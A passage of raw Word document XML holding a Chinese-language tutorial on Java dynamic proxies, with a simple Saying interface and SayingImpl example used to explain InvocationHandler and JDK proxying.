          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Loader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InvocationHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于执行除了被代理接口中方法之外的用户自定义的操作，它也是用户需要代理的最终目的。用户调用目标方法都被代理到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InvocationHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类中唯一方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>invoke()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:hyperlink r:id="rId229" w:history="1">
        <w:r w:rsidRPr="00074345">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:cs="Tahoma"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
          </w:rPr>
          <w:t>http://www.jb51.net/article/48379.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>这篇文章主要介绍了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>动态代理和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>cglib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>动态代理示例，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>JDK1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>提供了动态代理的技术，允许开发者在运行期间创建接口的代理实例，下面我们使用示例学习一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F6FBFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态代理类可以分为两种。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>静态代理：由程序员创建或特定工具自动生成源代码，再对其编译。在程序运行前，代理类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.class</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件就已经存在了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DD2C39">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态代理：在程序运行时，运用反射机制动态创建而成。</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一、首先我们进行</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理的演示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>现在我们有一个简单的业务接口</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Saying</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:after="38" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>package testAOP;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public interface Saying {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public void sayHello(String name);    </w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public void talking(String name);</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>一个简单的实现类</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SayingImpl,</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:after="38" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>package testAOP;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public class SayingImpl implements Saying {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    public void sayHello(String name) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        // TODO Auto-generated method stub</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.println(name + "</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：大家好啊！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    public void talking(String name) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        // TODO Auto-generated method stub</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.println(name + "</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：我的意思是，我们要努力建设和谐社会！</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>我们要实现的是，在</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sayHello</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>talking</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>之前和之后分别动态植入处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理主要用到</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java.lang.reflect</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>包中的两个类：</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
